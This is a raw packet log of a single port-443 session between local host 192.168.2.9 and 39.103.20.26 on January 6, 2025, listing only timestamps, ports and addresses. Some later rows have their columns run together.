Jan 6, 2025 04:43:37.361630917 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.361680031 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.361759901 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.361810923 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.361840963 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.361922026 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.361946106 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.361963034 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.361967087 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.361995935 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.362006903 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.362040043 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.362044096 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.362095118 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.362282991 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.362330914 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.362432003 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.362462997 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.362476110 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.362479925 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.362509012 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.362540007 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.362685919 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.362731934 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.362828016 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.362854004 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.362873077 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.362876892 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.362901926 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.362915993 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363049030 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363080025 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363095045 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363099098 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363106966 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363126040 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363142014 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363146067 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363161087 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363181114 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363185883 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363217115 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363226891 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363230944 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363243103 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363251925 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363264084 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363266945 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363291979 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363317013 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363790989 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363818884 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363836050 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363840103 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363850117 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363864899 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363890886 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363894939 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.363926888 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.363941908 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.364003897 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.364275932 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.364310026 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.364336014 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.364340067 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.364367962 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.364377022 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.364484072 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.364515066 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.364540100 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.364542007 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.364552021 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.364563942 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.364588022 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.364898920 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.364932060 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.364947081 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.364950895 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.364984035 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.364989996 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.451306105 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.451343060 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.451375008 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.451384068 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.451400042 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.451410055 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.451427937 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.451442003 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.451461077 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.451507092 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.451531887 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.451575994 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.451639891 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.451694965 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.451750994 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.451781034 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.451801062 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.451805115 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.451828003 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.451845884 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.451926947 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.451961040 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.451984882 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.451989889 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452033043 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452109098 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452128887 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452153921 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452157974 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452172041 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452200890 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452202082 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452210903 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452244043 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452323914 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452356100 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452400923 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452400923 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452405930 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452493906 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452579021 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452608109 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452630997 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452630997 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452635050 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452652931 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452677965 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452682018 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452703953 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452744007 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452836037 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452866077 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452874899 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452892065 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452898026 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.452929974 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.452963114 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.453119993 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453146935 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453171015 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.453175068 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453197002 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.453214884 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.453372002 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453402042 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453412056 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453424931 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.453428030 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453438997 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.453475952 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.453500986 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453530073 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453552008 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.453555107 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453567028 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.453587055 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.453634024 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453680038 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.453766108 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453798056 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453807116 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453815937 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.453819036 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.453860044 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.541976929 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.542098999 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:37.747338057 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:37.749016047 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:38.179332972 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.179543018 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:38.306148052 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:38.306157112 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.306165934 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.306513071 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:38.306519985 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.306530952 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.306756973 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:38.306761980 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.306777954 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.306788921 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.306917906 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:38.306917906 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:38.306937933 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.306955099 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.306971073 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.306974888 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.307049990 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:38.307055950 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.307213068 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:38.307390928 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:38.307395935 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.307524920 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:38.519339085 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.519412994 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:38.947343111 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:38.947387934 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.038769960 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.038780928 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.038790941 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.038872957 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.038877964 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.038894892 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.038968086 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.038973093 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.038984060 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.038997889 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.039083004 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.039088011 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.039100885 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.039113045 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.039122105 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.039135933 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.039175034 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.039179087 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.039287090 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.039341927 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.039346933 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.039403915 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.247334957 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.247381926 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.261925936 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.261933088 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.261950970 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.261967897 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.262116909 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.262124062 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.262151957 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.262167931 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.262236118 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.262242079 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.262351036 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.262394905 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.262398958 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.262466908 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.471335888 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.471383095 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.481271982 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.481278896 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.481288910 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.481292009 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.481365919 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.481372118 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.481380939 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.481385946 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.481422901 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.481467009 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.513391018 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.513397932 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.513411045 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.513417006 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.513609886 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.513614893 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.513629913 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.513641119 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.513870001 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.513933897 CET  49978        443        192.168.2.9    39.103.20.26
Jan 6, 2025 04:43:39.723321915 CET  443          49978      39.103.20.26   192.168.2.9
Jan 6, 2025 04:43:39.726979971 CET  49978        443        192.168.2.9    39.103.20.26
                                                    Jan 6, 2025 04:43:39.752942085 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:39.752947092 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:39.752959967 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:39.752964973 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:39.753123999 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:39.786572933 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:39.786577940 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:39.786593914 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:39.786606073 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:39.786607981 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:39.786842108 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:39.786847115 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:39.786917925 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:39.786937952 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:39.786971092 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:39.786971092 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:39.787015915 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:39.991337061 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:39.991493940 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.077779055 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.077789068 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.077807903 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.077811003 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.078089952 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.114842892 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.114864111 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.114888906 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.114921093 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.114923954 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.115077972 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.115087032 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.115149975 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.115169048 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.115226984 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.115672112 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.323333979 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.323575020 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.359285116 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.359294891 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.359309912 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.359441996 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.441859007 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.441870928 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.441889048 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.441903114 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.441905975 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.442126989 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.442126989 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.442132950 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.442157030 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.442383051 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.651339054 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.651489973 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.760948896 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.760962009 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.760978937 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.761128902 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.854051113 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.854059935 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.854079008 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.854093075 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.854095936 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.854263067 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.854269981 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.854284048 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:40.854312897 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:40.854438066 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.059336901 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.059504032 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.475336075 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.475388050 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.519308090 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.519323111 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.519335032 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.519344091 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.519397974 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.519402981 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.519411087 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.519419909 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.519447088 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.519490957 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.627218962 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.627227068 CET4434997839.103.20.26192.168.2.9
